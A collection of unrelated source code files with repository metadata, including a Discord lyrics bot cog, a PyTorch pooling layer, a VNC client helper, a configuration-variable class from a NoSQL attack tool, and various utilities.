x*airy_bi(x)
sage: airy_bi(-2, x, hold_derivative=False)
airy_bi(-2, x)
sage: airy_bi(n, x)
airy_bi(n, x)
It can be evaluated symbolically or numerically for real or complex
values::
sage: airy_bi(0)
1/3*3^(5/6)/gamma(2/3)
sage: airy_bi(0.0)
0.614926627446001
sage: airy_bi(I)
airy_bi(I)
sage: airy_bi(1.0*I)
0.648858208330395 + 0.344958634768048*I
The functions can be evaluated numerically using mpmath,
which can compute the values to arbitrary precision, and scipy::
sage: airy_bi(2).n(prec=100)
3.2980949999782147102806044252
sage: airy_bi(2).n(algorithm='mpmath', prec=100)
3.2980949999782147102806044252
sage: airy_bi(2).n(algorithm='scipy') # rel tol 1e-10
3.2980949999782134
And the derivatives can be evaluated::
sage: airy_bi(1, 0)
3^(1/6)/gamma(1/3)
sage: airy_bi(1, 0.0)
0.448288357353826
Plots::
sage: plot(airy_bi(x), (x, -10, 5)) + plot(airy_bi_prime(x),
....: (x, -10, 5), color='red')
Graphics object consisting of 2 graphics primitives
**References**
- Abramowitz, Milton; Stegun, Irene A., eds. (1965), "Chapter 10"
- :wikipedia:`Airy_function`
"""
# We catch the case with no alpha
if x is None:
x = alpha
return airy_bi_simple(x, **kwds)
# We take care of all other cases.
if not alpha in ZZ and not isinstance(alpha, Expression):
return airy_bi_general(alpha, x, **kwds)
if hold_derivative:
return airy_bi_general(alpha, x, **kwds)
elif alpha == 0:
return airy_bi_simple(x, **kwds)
elif alpha == 1:
return airy_bi_prime(x, **kwds)
elif alpha > 1:
# We use a different variable here because if x is a
# particular value, we would be differentiating a constant
# which would return 0. What we want is the value of
# the derivative at the value and not the derivative of
# a particular value of the function.
v = SR.symbol()
return derivative(airy_bi_simple(v, **kwds), v, alpha).subs({v: x})
else:
return airy_bi_general(alpha, x, **kwds)
| 33.57461 | 106 | 0.548524 |
8f745849e52fa61740852128171f2de7c13525f0 | 2,953 | py | Python | cogs/lyrics.py | ssebastianoo/SpotifyLyrics | 489c5e9f3b76f40a497ea82e85ebbb178f2a774b | [
"MIT"
] | 2 | 2021-07-24T18:15:05.000Z | 2021-11-14T11:29:04.000Z | cogs/lyrics.py | ssebastianoo/SpotifyLyrics | 489c5e9f3b76f40a497ea82e85ebbb178f2a774b | [
"MIT"
] | null | null | null | cogs/lyrics.py | ssebastianoo/SpotifyLyrics | 489c5e9f3b76f40a497ea82e85ebbb178f2a774b | [
"MIT"
] | null | null | null | import discord
from urllib.parse import quote
from discord.ext import commands
from discord_slash import cog_ext, SlashContext
from discord_slash.utils.manage_commands import create_option
class Lyrics(commands.Cog):
def __init__(self, bot):
self.bot = bot
@cog_ext.cog_slash(name="lyrics", description="Get the lyrics of a song a member is listening to", options=[create_option(
name="member",
description="The member you want to get info about",
option_type=6,
required=False,
)])
async def settings_slash(self, ctx: SlashContext, member=None):
if not member:
member = ctx.guild.get_member(ctx.author.id)
await self.lyrics(ctx, member)
@commands.command()
async def lyrics(self, ctx, member: discord.Member=None):
member = member or ctx.author
activities = [activity for activity in member.activities if activity.type == discord.ActivityType.listening]
if len(activities) == 0:
emb = discord.Embed(description=f"{member.mention} isn't listening to Spotify at the moment.", colour=discord.Colour.red())
try: await ctx.reply(embed=emb, mention_author=False)
except: await ctx.send(embed=emb)
return
activity = activities[0]
title = activity.title
artists = activity.artist
query = quote(title + " " + artists)
emb = discord.Embed(description="Searching lyrics...", colour=activity.colour)
try: msg = await ctx.reply(embed=emb, mention_author=False)
except: msg = await ctx.send(embed=emb)
res = await self.bot.session.get(f"https://some-random-api.ml/lyrics?title={query}")
data = await res.json()
if data.get("error"):
emb = discord.Embed(description=data.get("error"), colour=discord.Colour.red())
return await msg.edit(embed=emb)
paginator = commands.Paginator(prefix=None, suffix=None, max_size=4096)
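        # Note (editor's comment): max_size=4096 matches Discord's embed
        # description character limit, so each paginator page fits in a
        # single embed below.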
for line in data["lyrics"].splitlines():
paginator.add_line(line)
emb = discord.Embed(title=f"{data['author']} | {data['title']}", description=paginator.pages[0], colour=activity.colour)
emb.set_author(name=str(member), icon_url=str(member.avatar_url_as(static_format="png")))
emb.set_thumbnail(url=activity.album_cover_url)
if len(paginator.pages) > 1:
emb.set_footer(text=f"Pag. 1/{len(paginator.pages)}")
await msg.edit(embed=emb)
emb = discord.Embed(colour=activity.colour)
count = 0
for pag in paginator.pages:
if count == 0:
pass
else:
emb.description = pag
emb.set_footer(text=f"Pag. {count + 1}/{len(paginator.pages)}")
msg = await msg.reply(embed=emb, mention_author=False)
count += 1
def setup(bot):
bot.add_cog(Lyrics(bot))
| 37.858974 | 135 | 0.631561 |
13c78543efaa5ffd0f66b231a8493e977a6eafa6 | 152 | py | Python | src/modules/helper/formatters.py | spotlightpa/covid-alerts-emailer | 6362b841aa348d33096489495a9d4a2a4925cff7 | [
"MIT"
] | 1 | 2021-03-19T16:03:39.000Z | 2021-03-19T16:03:39.000Z | src/modules/helper/formatters.py | spotlightpa/covid-alerts-emailer | 6362b841aa348d33096489495a9d4a2a4925cff7 | [
"MIT"
] | null | null | null | src/modules/helper/formatters.py | spotlightpa/covid-alerts-emailer | 6362b841aa348d33096489495a9d4a2a4925cff7 | [
"MIT"
] | null | null | null | def format_commas(number: int):
"""
    Takes an int and adds commas as thousands separators, e.g. converts 10000 to 10,000.
"""
return "{:,}".format(number)
| 25.333333 | 70 | 0.625 |
74109f55606dd7e4528a6816a2f9a41b90b018cd | 2,309 | py | Python | DPPinPytorch/positive bias.py | visinf/dpp | e810bd63ed61bd7710559467bcd9a35ab9a1b028 | [
"BSD-3-Clause"
] | 118 | 2018-04-12T02:41:43.000Z | 2022-03-09T12:49:58.000Z | DPPinPytorch/positive bias.py | visinf/dpp | e810bd63ed61bd7710559467bcd9a35ab9a1b028 | [
"BSD-3-Clause"
] | 11 | 2018-05-09T11:51:21.000Z | 2020-09-02T10:19:14.000Z | DPPinPytorch/positive bias.py | visinf/dpp | e810bd63ed61bd7710559467bcd9a35ab9a1b028 | [
"BSD-3-Clause"
] | 22 | 2018-04-12T16:16:04.000Z | 2020-07-15T03:20:29.000Z | # Copyright (c) 2018, TU Darmstadt.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
# import tc and torch both
import tensor_comprehensions as tc
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.serialization import load_lua
# define the operation as TC language
lang = """
def PositivePowBias(float(B, C, W, H) I0, float(C) Alpha, float(C) Lambda) -> (O) {
O(b, c, w, h) = pow(I0(b, c, w, h),exp(Lambda(c)))
O(b, c, w, h) = O(b, c, w, h) + exp(Alpha(c))
}
def PositivePowBias_grad(float(B, C, W, H) I0, float(C) Alpha, float(C) Lambda, float(B,C,W,H) d_O) -> (d_I0, d_Lambda, d_Alpha){
d_I0(b,c,w,h) = pow(I0(b,c,w,h), exp(Lambda(c))-1) * exp(Lambda(c))
d_Lambda(c) +=! pow(I0(b,c,w,h),exp(Lambda(c))) * log(I0(b,c,w,h))*exp(Lambda(c))
d_Alpha (c) = B*W*H*exp(Alpha(c))
}
"""
# register the lang with TC backend
PositivePowBias = tc.define(lang, training=True, name="PositivePowBias", backward="PositivePowBias_grad")
# create input cuda tensors
B,C,W,H = 32, 512, 32, 32
I0, Alpha, Lambda = torch.randn(B, C, W, H).cuda(), torch.randn(C).cuda(),torch.randn(C).cuda()
# choose the options that resemble the operation and run
#out = tensordot(I0, I1, options=tc.Options("conv"))
# autotune the kernel
best_options = PositivePowBias.autotune(I0, Alpha, Lambda, cache="PositivePowBias_32_512_32_32.tc",generations=2)
# run the kernel with the autotuned options
#out = PositivePowBias(I0, Alpha, Lambda, options=best_options)
class pospowbias(nn.Module):
def __init__(self):
super(pospowbias, self).__init__()
self.Lambda = nn.Parameter(torch.zeros(1))
self.Alpha = nn.Parameter(torch.zeros(1))
def forward(self, x):
return PositivePowBias(x, self.Alpha, self.Lambda, options=best_options)
class DPP(nn.Module):
def __init__(self):
        super(DPP, self).__init__()
self.pospowbias=pospowbias()
def forward(self, I):
It = F.upsample(F.avg_pool2d(I, 2), scale_factor=2, mode='nearest')
x = ((I-It)**2)+1e-3
xn = F.upsample(F.avg_pool2d(x, 2), scale_factor=2, mode='nearest')
        w = self.pospowbias(x/xn)
kp = F.avg_pool2d(w, 2)
Iw = F.avg_pool2d(I*w, 2)
return Iw/kp
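# Rough usage sketch (editor's addition, not from the original repository):
# DPP weights each pixel by its local detail before 2x average pooling, so the
# output is half the spatial size of the input.  Shapes below are assumptions
# for illustration only; the TC kernel above was autotuned for CUDA inputs of
# shape (32, 512, 32, 32).
#
#     pool = DPP()
#     feats = torch.randn(32, 512, 32, 32).cuda()
#     out = pool(feats)   # expected shape: (32, 512, 16, 16)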
| 38.483333 | 129 | 0.661758 |
334e220fa4fc0b1d730eb14026f00e3b8f3a01ac | 1,369 | py | Python | geocamUtil/plane.py | finleyexp/georef_geocamutilweb | 3ea2d2cf65928cba6ad6fb0a8b601e19d2cb17f6 | [
"NASA-1.3"
] | null | null | null | geocamUtil/plane.py | finleyexp/georef_geocamutilweb | 3ea2d2cf65928cba6ad6fb0a8b601e19d2cb17f6 | [
"NASA-1.3"
] | null | null | null | geocamUtil/plane.py | finleyexp/georef_geocamutilweb | 3ea2d2cf65928cba6ad6fb0a8b601e19d2cb17f6 | [
"NASA-1.3"
] | 4 | 2017-07-16T03:21:09.000Z | 2019-11-12T20:29:36.000Z | # Based on https://github.com/phire/Python-Ray-tracer/blob/master/plane.py
# https://gist.github.com/rossant/6046463
"""A ray-traceable Plane is a Plane through a given
point with a given normal and surface material.
It needs an intersect method that returns the
distance along a given ray to the
plane and a normal method that returns the normal
at a given point (which is irrelevant for a plane
as the normal is the same everywhere)."""
from geom3 import Vector3, Point3, Ray3, dot, unit
from math import sqrt
from hit import Hit
import numpy as np
class Plane(object):
"""A ray-traceable plane"""
def __init__(self, point, normal):
"""Create a plane through a given point with given normal"""
self.point = point
self.norm = unit(normal)
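    def normal(self, point=None):
        # Editor's sketch: the class docstring also asks for a ``normal``
        # method; for a plane the normal is the same everywhere, so any
        # queried point can be ignored.
        return self.norm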
def intersect(self, ray):
# Return the distance from O to the intersection of the ray (O, D) with the
# plane (P, N), or +inf if there is no intersection.
# O and P are 3D points, D and N (normal) are normalized vectors.
O = ray.start
D = ray.dir
P = self.point # some point on the plane
N = self.norm # normal vector to the plane
denom = np.dot(D, N)
if np.abs(denom) < 1e-6:
return np.inf
d = np.dot(P - O, N) / denom
if d < 0:
return np.inf
return d | 36.026316 | 84 | 0.6355 |
a246d4b95469792f1d2cfe0a1633d051e4312b91 | 100 | py | Python | src/product/apps.py | asanka94/OMS-backend | 0b0637b40e71b9b71156d28fdc0ff1fb7a3d12ac | [
"MIT"
] | null | null | null | src/product/apps.py | asanka94/OMS-backend | 0b0637b40e71b9b71156d28fdc0ff1fb7a3d12ac | [
"MIT"
] | 9 | 2021-03-19T01:50:04.000Z | 2022-03-12T00:23:18.000Z | src/product/apps.py | asanka94/OMS-backend | 0b0637b40e71b9b71156d28fdc0ff1fb7a3d12ac | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class CatalogueConfig(AppConfig):
name = 'src.product'
| 16.666667 | 34 | 0.72 |
a4620f042ba0825ffed3e8c8cbaf32acd2f87149 | 1,143 | py | Python | project/app/urls.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/urls.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/urls.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | # Django
from django.urls import path
from django.views.generic import TemplateView
# Local
from . import views
urlpatterns = [
# Root
path('', views.index, name='index',),
# Footer
path('about/', TemplateView.as_view(template_name='app/pages/about.html'), name='about',),
path('faq/', TemplateView.as_view(template_name='app/pages/faq.html'), name='faq',),
path('privacy/', TemplateView.as_view(template_name='app/pages/privacy.html'), name='privacy',),
path('terms/', TemplateView.as_view(template_name='app/pages/terms.html'), name='terms',),
path('support/', TemplateView.as_view(template_name='app/pages/support.html'), name='support',),
# Authentication
path('join', views.join, name='join'),
path('callback', views.callback, name='callback'),
path('login', views.login, name='login'),
path('logout', views.logout, name='logout'),
# Account
path('account', views.account, name='account',),
# Delete
path('delete', views.delete, name='delete',),
# EMail
path('inbound', views.inbound, name='inbound',),
path('wistia', views.wistia, name='wistia',),
]
| 32.657143 | 100 | 0.663167 |
096765c66bcded8e910b616b1bb7f680a0d9496f | 2,017 | py | Python | NoSQLAttack/globalVar.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 8 | 2019-02-17T20:11:46.000Z | 2019-10-18T06:27:16.000Z | NoSQLAttack/globalVar.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | null | null | null | NoSQLAttack/globalVar.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 4 | 2019-02-17T23:00:18.000Z | 2019-10-18T06:27:14.000Z | class GlobalVar:
optionSet = [False] * 9
yes_tag = ['y', 'Y'] # easy for users to choose "y" or "Y"
no_tag = ['n', 'N']
victim = "Not Set" # target IP
webPort = 80
url = "Not Set"
httpMethod= "Not Set"
platform = "Not Set"
https = "Not Set" # use http or https for attacking URL
myIP = "Not Set" # local IP
myPort = "Not Set" # local port
verb = "Not Set" # verbose mode mean user can get more detail info while attacking
scanNeedCreds = "Not Set"
dbPort = 27017
vulnAddrs = []
possAddrs = []
def set_vulnAddrs(value):
GlobalVar.vulnAddrs.append(value)
def get_vulnAddrs():
return GlobalVar.vulnAddrs
def set_possAddrs(value):
GlobalVar.possAddrs.append(value)
def get_possAddrs():
return GlobalVar.possAddrs
def set_optionSet(i,value):
GlobalVar.optionSet[i]=value
def get_optionSet(i):
return GlobalVar.optionSet[i]
def get_yes_tag():
return GlobalVar.yes_tag
def get_no_tag():
return GlobalVar.no_tag
def set_victim(value):
GlobalVar.victim = value
def get_victim():
return GlobalVar.victim
def set_webPort(value):
GlobalVar.webPort = value
def get_webPort():
return GlobalVar.webPort
def set_url(value):
GlobalVar.url = value
def get_url():
return GlobalVar.url;
def set_httpMethod(value):
GlobalVar.httpMethod = value
def get_httpMethod():
return GlobalVar.httpMethod
def set_platform(value):
GlobalVar.platform = value
def get_platform():
return GlobalVar.platform
def set_myIP(value):
GlobalVar.myIP = value
def get_myIP():
return GlobalVar.myIP
def set_myPort(value):
GlobalVar.myPort = value
def get_myPort():
return GlobalVar.myPort
def set_dbPort(value):
GlobalVar.dbPort = value
def get_dbPort():
return GlobalVar.dbPort
def set_https(value):
GlobalVar.https = value
def get_https():
        return GlobalVar.https
def set_verb(value):
GlobalVar.verb = value
def get_verb():
return GlobalVar.verb
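    # Editor's note: the getters/setters above are plain functions in the
    # class body (no ``self`` / ``@staticmethod``), so they are called on the
    # class itself.  Minimal usage sketch (assuming Python 3 semantics):
    #
    #     GlobalVar.set_victim("192.168.0.10")
    #     GlobalVar.get_victim()   # -> "192.168.0.10"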
scanNeedCreds = "not set" | 22.920455 | 86 | 0.6941 |
5afe39edf37c3d89a94a1a9314b3b787dcd6a764 | 963 | py | Python | capsules/classifier_person_attributes_openvino/capsule.py | aotuai/capsule-zoo | bb0093799cf035a88153a9be6ed1e58df9923a8e | [
"BSD-3-Clause"
] | 11 | 2021-02-08T03:23:17.000Z | 2022-03-15T08:31:59.000Z | capsules/classifier_person_attributes_openvino/capsule.py | aotuai/capsule-zoo | bb0093799cf035a88153a9be6ed1e58df9923a8e | [
"BSD-3-Clause"
] | 5 | 2020-12-31T20:43:18.000Z | 2021-03-24T02:26:41.000Z | capsules/classifier_person_attributes_openvino/capsule.py | aotuai/capsule-zoo | bb0093799cf035a88153a9be6ed1e58df9923a8e | [
"BSD-3-Clause"
] | 6 | 2021-01-25T10:59:37.000Z | 2022-02-26T07:36:43.000Z | from vcap import BaseCapsule, DeviceMapper, NodeDescription
from .backend import ATTRIBUTES, Backend, options
class Capsule(BaseCapsule):
name = "classifier_person_attributes_openvino"
description = "OpenVINO powered person classifier, " \
"for general person appearance attributes."
version = 1
device_mapper = DeviceMapper.map_to_openvino_devices()
input_type = NodeDescription(
size=NodeDescription.Size.SINGLE,
detections=["person"])
output_type = NodeDescription(
size=NodeDescription.Size.SINGLE,
detections=["person"],
attributes=ATTRIBUTES,
)
backend_loader = lambda capsule_files, device: Backend(
model_xml=capsule_files[
"person-attributes-recognition-crossroad-0230-fp16.xml"],
weights_bin=capsule_files[
"person-attributes-recognition-crossroad-0230-fp16.bin"],
device_name=device
)
options = options
| 34.392857 | 69 | 0.694704 |
0941925ca50893b1f5e0c08e7b0c319c1cc68a1e | 3,103 | py | Python | isi_sdk_8_1_0/isi_sdk_8_1_0/models/reports_threats.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_1_0/isi_sdk_8_1_0/models/reports_threats.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_1_0/isi_sdk_8_1_0/models/reports_threats.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 5
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_1_0.models.reports_threats_report import ReportsThreatsReport # noqa: F401,E501
class ReportsThreats(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'reports': 'list[ReportsThreatsReport]'
}
attribute_map = {
'reports': 'reports'
}
def __init__(self, reports=None): # noqa: E501
"""ReportsThreats - a model defined in Swagger""" # noqa: E501
self._reports = None
self.discriminator = None
if reports is not None:
self.reports = reports
@property
def reports(self):
"""Gets the reports of this ReportsThreats. # noqa: E501
:return: The reports of this ReportsThreats. # noqa: E501
:rtype: list[ReportsThreatsReport]
"""
return self._reports
@reports.setter
def reports(self, reports):
"""Sets the reports of this ReportsThreats.
:param reports: The reports of this ReportsThreats. # noqa: E501
:type: list[ReportsThreatsReport]
"""
self._reports = reports
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReportsThreats):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.982609 | 95 | 0.571383 |
2475cf39b97c1c7be54865dcb1346f671b0792a6 | 3,359 | py | Python | vncdotool/api.py | easybe/vncdotool | 2ed9d4fa69b596c5ee848bc6d48c875dfe1d7282 | [
"MIT"
] | 2 | 2015-11-10T15:02:29.000Z | 2021-09-14T23:34:22.000Z | vncdotool/api.py | easybe/vncdotool | 2ed9d4fa69b596c5ee848bc6d48c875dfe1d7282 | [
"MIT"
] | null | null | null | vncdotool/api.py | easybe/vncdotool | 2ed9d4fa69b596c5ee848bc6d48c875dfe1d7282 | [
"MIT"
] | 1 | 2021-09-14T23:34:28.000Z | 2021-09-14T23:34:28.000Z | """ Helpers to allow vncdotool to be intergrated into other applications.
This feature is under developemental, you're help testing and
debugging is appreciated.
"""
import threading
import Queue
import logging
from twisted.internet import reactor
from twisted.internet.defer import maybeDeferred
from twisted.python.log import PythonLoggingObserver
from twisted.python.failure import Failure
from vncdotool import command
from vncdotool.client import VNCDoToolFactory, VNCDoToolClient
__all__ = ['connect']
log = logging.getLogger('vncdotool.api')
_THREAD = None
class VNCDoException(Exception):
pass
def connect(server, password=None):
""" Connect to a VNCServer and return a Client instance that is usable
in the main thread of non-Twisted Python Applications, EXPERIMENTAL.
>>> from vncdotool import api
>>> client = api.connect('host')
>>> client.keyPress('c')
>>> api.shutdown()
You may then call any regular VNCDoToolClient method on client from your
application code.
If you are using a GUI toolkit or other major async library please read
http://twistedmatrix.com/documents/13.0.0/core/howto/choosing-reactor.html
for a better method of intergrating vncdotool.
"""
if not reactor.running:
global _THREAD
_THREAD = threading.Thread(target=reactor.run, name='Twisted',
kwargs={'installSignalHandlers': False})
_THREAD.daemon = True
_THREAD.start()
observer = PythonLoggingObserver()
observer.start()
factory = VNCDoToolFactory()
if password is not None:
factory.password = password
client = ThreadedVNCClientProxy(factory)
host, port = command.parse_host(server)
client.connect(host, port)
return client
def shutdown():
if not reactor.running:
return
reactor.callFromThread(reactor.stop)
_THREAD.join()
class ThreadedVNCClientProxy(object):
def __init__(self, factory):
self.factory = factory
self.queue = Queue.Queue()
def connect(self, host, port=5900):
reactor.callWhenRunning(reactor.connectTCP, host, port, self.factory)
def __getattr__(self, attr):
method = getattr(VNCDoToolClient, attr)
def errback(reason, *args, **kwargs):
self.queue.put(Failure(reason))
def callback(protocol, *args, **kwargs):
def result_callback(result):
self.queue.put(result)
return result
d = maybeDeferred(method, protocol, *args, **kwargs)
d.addBoth(result_callback)
return d
def proxy_call(*args, **kwargs):
reactor.callFromThread(self.factory.deferred.addCallbacks,
callback, errback, args, kwargs)
result = self.queue.get(timeout=60 * 60)
if isinstance(result, Failure):
raise VNCDoException(result)
return result
return proxy_call
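# Editor's note: __getattr__ above is what makes the proxy usable from a
# non-Twisted thread -- each VNCDoToolClient method is looked up by name,
# scheduled onto the reactor thread with reactor.callFromThread, and the
# calling thread blocks on self.queue until the Deferred fires; failures are
# re-raised as VNCDoException.  Illustrative call flow:
#
#     client = connect('hostname')   # returns a ThreadedVNCClientProxy
#     client.keyPress('a')           # proxied call, blocks until completed
#     shutdown()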
if __name__ == '__main__':
import sys
logging.basicConfig(level=logging.DEBUG)
server = sys.argv[1]
client1 = connect(server)
client2 = connect(server)
client1.captureScreen('screenshot.png')
for key in 'username':
client2.keyPress(key)
for key in 'passw0rd':
client1.keyPress(key)
shutdown()
| 26.242188 | 78 | 0.664781 |
511cba785414c0fa94176b5261d2ca7355db897a | 1,743 | py | Python | kglib/kgcn/models/embedding.py | lolski/kglib | 2265009bc066454accb88cdaad8769b920d5df39 | [
"Apache-2.0"
] | null | null | null | kglib/kgcn/models/embedding.py | lolski/kglib | 2265009bc066454accb88cdaad8769b920d5df39 | [
"Apache-2.0"
] | null | null | null | kglib/kgcn/models/embedding.py | lolski/kglib | 2265009bc066454accb88cdaad8769b920d5df39 | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import tensorflow as tf
import sonnet as snt
from kglib.kgcn.models.typewise import TypewiseEncoder
def common_embedding(features, num_types, type_embedding_dim):
preexistance_feat = tf.expand_dims(tf.cast(features[:, 0], dtype=tf.float32), axis=1)
type_embedder = snt.Embed(num_types, type_embedding_dim)
type_embedding = type_embedder(tf.cast(features[:, 1], tf.int32))
return tf.concat([preexistance_feat, type_embedding], axis=1)
def attribute_embedding(features, attr_encoders, attr_embedding_dim):
typewise_attribute_encoder = TypewiseEncoder(attr_encoders, attr_embedding_dim)
return typewise_attribute_encoder(features[:, 1:])
def node_embedding(features, num_types, type_embedding_dim, attr_encoders, attr_embedding_dim):
return tf.concat([common_embedding(features, num_types, type_embedding_dim),
attribute_embedding(features, attr_encoders, attr_embedding_dim)], axis=1)
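# Editor's note on the assumed feature layout (inferred from the code above):
# features[:, 0] is a pre-existence flag, features[:, 1] is an integer type
# index, and the remaining columns carry raw attribute values (the typewise
# encoder receives features[:, 1:], i.e. the type index plus attribute values).
# node_embedding then concatenates the common and attribute embeddings, so the
# output width is roughly 1 + type_embedding_dim + attr_embedding_dim per node.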
| 43.575 | 96 | 0.769937 |
19e12d057783bf2f5a920da0463e6f7e3948b1c0 | 1,764 | py | Python | __constants/constants.py | priyanshuga/Automatic-Udemy-Courses-Grabber | 44426ca2b7b9cb4f18196e12d4d3096baf2b8154 | [
"MIT"
] | null | null | null | __constants/constants.py | priyanshuga/Automatic-Udemy-Courses-Grabber | 44426ca2b7b9cb4f18196e12d4d3096baf2b8154 | [
"MIT"
] | null | null | null | __constants/constants.py | priyanshuga/Automatic-Udemy-Courses-Grabber | 44426ca2b7b9cb4f18196e12d4d3096baf2b8154 | [
"MIT"
] | null | null | null | ########## SITEWIDE CONSTANTS ############
animation = ["[■□□□□□□□□□□□□□]", "[■■□□□□□□□□□□□□]", "[■■■□□□□□□□□□□□]", "[■■■■□□□□□□□□□□]", "[■■■■□□□□□□□□□□]", "[■■■■■□□□□□□□□□]",
"[■■■■■■□□□□□□□□]", "[■■■■■■■□□□□□□□]", "[■■■■■■■■□□□□□□]", "[■■■■■■■■■□□□□□]", "[■■■■■■■■■□□□□]", "[■■■■■■■■■■□□□]", "[■■■■■■■■■■■□□]", "[■■■■■■■■■■■■□]", "[■■■■■■■■■■■■■]"]
DISCUD = 'https://www.discudemy.com/all/'
UDEMYFREEBIES = 'https://www.udemyfreebies.com/free-udemy-courses/'
UDEMYCOUPONS = 'https://udemycoupons.me/'
REALDISC = 'https://www.real.discount/product-tag/100-off/page/'
LEARNVIR = 'https://udemycoupon.learnviral.com/coupon-category/free100-discount/page/'
TRICKSINF = 'https://tricksinfo.net/page/'
WEBCART = 'https://www.freewebcart.com/page/'
COURSEMANIA = 'https://api.coursemania.xyz/api/get_courses'
HELPCOV = 'https://asia-east2-myhelpcovid19.cloudfunctions.net/app/courses?pagesize=50&source=udemy'
JOJOCP = 'https://jojocoupons.com/category/udemy/page/'
ONLINETUT = 'https://udemycoupon.onlinetutorials.org/page/'
CHECKOUT = 'https://www.udemy.com/payment/checkout-submit/'
FREE_ENROLL1 = 'https://www.udemy.com/api-2.0/users/me/subscribed-courses/?fields%5Buser%5D=title%2Cimage_100x100&fields%5Bcourse%5D=title%2Cheadline%2Curl%2Ccompletion_ratio%2Cnum_published_lectures%2Cimage_480x270%2Cimage_240x135%2Cfavorite_time%2Carchive_time%2Cis_banned%2Cis_taking_disabled%2Cfeatures%2Cvisible_instructors%2Clast_accessed_time%2Csort_order%2Cis_user_subscribed%2Cis_wishlisted'
total_sites = [
'Discudemy',
'Udemy Freebies',
'Udemy Coupons',
#'Real Discount',
#'Tricks Info',
#'Free Web Cart',
'Course Mania',
#'Jojo Coupons',
"Online Tutorials"
]
site_range = [ 3, 3, 2,
#5, 6, 7,
2, # 4,
4]
| 47.675676 | 400 | 0.60941 |
4ba4e0af2158066f2a17b8af43dc42fa8735599d | 1,414 | py | Python | jiant/utils/string_comparing.py | yzpang/jiant | 192d6b525c06f33010b59044df40cb86bbfba4ea | [
"MIT"
] | 1,108 | 2019-04-22T09:19:19.000Z | 2022-03-31T13:23:51.000Z | jiant/utils/string_comparing.py | eric11eca/inference-information-probing | f55156201992cb024edf112e06dd2d7fe09381e4 | [
"MIT"
] | 737 | 2019-04-22T14:30:36.000Z | 2022-03-31T22:22:17.000Z | jiant/utils/string_comparing.py | eric11eca/inference-information-probing | f55156201992cb024edf112e06dd2d7fe09381e4 | [
"MIT"
] | 273 | 2019-04-23T01:42:11.000Z | 2022-03-25T15:59:38.000Z | import re
import string
import collections
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace.
From official ReCoRD eval script
"""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def string_f1_score(prediction, ground_truth):
"""Compute normalized token level F1
From official ReCoRD eval script
"""
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = collections.Counter(prediction_tokens) & collections.Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
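# Worked example (editor's addition): with prediction "The cat sat" and ground
# truth "a cat sat down", normalization lowercases and strips articles, giving
# ["cat", "sat"] vs ["cat", "sat", "down"].  num_same = 2, so precision = 2/2
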